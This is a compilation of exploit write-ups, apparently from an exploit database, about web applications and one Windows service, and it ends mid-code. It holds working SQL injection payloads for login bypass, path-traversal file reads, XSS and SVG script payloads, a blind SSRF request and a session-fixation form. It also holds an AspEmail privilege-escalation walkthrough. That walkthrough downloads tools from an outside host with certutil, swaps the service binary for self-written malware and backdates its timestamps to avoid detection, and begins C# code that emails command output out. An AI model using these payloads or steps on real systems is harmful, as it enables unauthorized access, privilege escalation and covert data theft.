Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=
---
web application technology: PHP 8.1.17, Apache 2.4.56
bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)
## Example 2 - login to administration panel
-----------------------------------------------------------------------------------------------------------------------
Param: username
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 42
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/newsportal/admin/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
Connection: close
username=admin'&password=Test%40123&login=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 11:00:53 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 505
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
Stack trace:
#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')
#1 {main}
thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/newsportal/admin/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
Connection: close
username=admin''&password=Test%40123&login=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 11:02:15 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4733
Connection: close
Content-Type: text/html; charset=UTF-8
<script>alert('Invalid Details');</script>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="News Portal.">
<meta name="author" content="PHPGurukul">
<!-- App title -->
<title>News Portal | Admin Panel</title>
[...]
# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link:
https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10
##################################### Arbitrary File Read PoC
#####################################
curl
https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
##################################### Arbitrary File Read PoC
#####################################
## Exploit Title: spip v4.1.10 - Spoofing Admin account
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
## Description:
The malicious user can upload a malicious SVG file which file is not
filtered by a security function, and he can trick
the administrator of this system to check his logo by clicking on him
and visiting, maybe a very dangerous URL.
Wrong web app website logic, and not well sanitizing upload function.
STATUS: HIGH- Vulnerability
[+]Exploit:
```SVG
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<linearGradient id="badgeGradient">
<stop offset="0"/>
<stop offset="1"/>
</linearGradient>
</defs>
<g id="heading">
<a xlink:href= "https://rb.gy/74f0y">
<path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z"/>
<!--<text id="label" x="5" y="20" transform = "rotate(-15 10
10)">New</text>-->
<text id="title" x="40" y="20">Please click on the logo, to
see our design services, on our website, thank you!</text>
</a>
</g>
</svg>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)
## Time spend:
00:37:00
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8
Bugs: Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
write https://youserver/test.xml to we_cmd[0] parameter
poc request
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close
we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
# Exploit Title: Beauty Salon Management System v1.0 - SQLi
# Date of found: 04/07/2023
# Exploit Author: Fatih Nacar
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
# CWE: CWE-89
Vulnerability Description -
Beauty Salon Management System: V1.0, developed by Campcodes, has been
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
allows an attacker to manipulate login authentication with the SQL queries
and bypass authentication. The system fails to properly validate
user-supplied input in the username and password fields during the login
process, enabling an attacker to inject malicious SQL code. By exploiting
this vulnerability, an attacker can bypass authentication and gain
unauthorized access to the system.
Steps to Reproduce -
The following steps outline the exploitation of the SQL Injection
vulnerability in Beauty Salon Management System V1.0:
1. Open the admin login page by accessing the URL:
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
2. In the username and password fields, insert the following SQL Injection
payload shown inside brackets to bypass authentication for usename
parameter:
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In}
3.Execute the SQL Injection payload.
As a result of successful exploitation, the attacker gains unauthorized
access to the system and is logged in with administrative privileges.
Sqlmap results:
POST parameter 'username' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 793
HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
rvYF&password=test&login=Sign In
---
[15:58:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.4, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS
Version: V10.4.1
Bugs: Multiple XSS
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download
Date of found: 09.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
### XSS-1 ###
visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=
payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E
### XSS-2 ###
steps:
1. login to account
2. go projects and create project
3.add attachment
3. upload svg file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
4. Go to svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )
### XSS-3 ###
Go to below adress (post request)
POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1
Host: localhost
Content-Length: 35
sec-ch-ua:
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3
Connection: close
resultAck=<script>alert(4)</script>
# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability
# Advisory ID: ZSL-2025-5916
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php
# CVE ID: CVE-2024-11317
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session
fixation, allowing an attacker to set a predefined PHPSESSID value. An
attacker can leverage an unauthenticated reflected XSS vulnerability in
jsonProxy.php to inject a crafted request, forcing the victim to adopt
a fixated session.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<body>
<!-- Session ID in a cookie (Client-side script) OWASP Ref.: -->
<form action="http://192.168.73.31/jsonProxy.php" method="GET">
<input type="hidden" name="application" value="zeroscience" />
<input type="hidden" name="query" value="<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>" />
<input type="submit" value="Fix!" />
</form>
</body>
</html>
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ================================================================================================================== #
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
# ==================================================================================================================
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
# ==================================================================================================================
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check for my malware ownership.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
# =================================================================================================================#
# #
####################################################################################################################
# #[EmailAgent.cs]# #
####################################################################################################################
# #
#
* We program this malware in such a way that when the server is reboot(when the services are restarted), #
* It will be triggered and execute the codes we want, #
* And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
Namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
